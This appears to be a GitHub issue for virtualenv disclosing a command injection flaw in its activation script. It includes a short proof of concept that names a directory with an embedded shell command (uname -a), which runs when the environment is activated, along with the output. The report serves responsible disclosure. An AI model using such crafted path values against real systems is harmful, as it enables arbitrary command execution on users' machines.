Command injection is possible via activation script

**Issue**

This issue was originally reported to Tidelift, with disclosure negotiated with the maintainer.

The activation script in `virtualenv` is command injectable via a crafted path:

```bash
envname="';uname -a;':"
mkdir "$envname"
cd "$envname"
virtualenv .
. ./bin/activate
```

```
Linux archlinux 6.10.6-arch1-1 #1 SMP PREEMPT_DYNAMIC Mon, 19 Aug 2024 17:02:39
```

The execution path is low-risk since users clearly know what they are doing. However, it makes *downstream attack vectors* possible. More details on possible exploits of a famous downstream were disclosed to the maintainers of that project and `virtualenv`.

**Environment**

- OS: Linux


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Command injection is possible via activation script #2768

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

Command injection is possible via activation script #2768

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions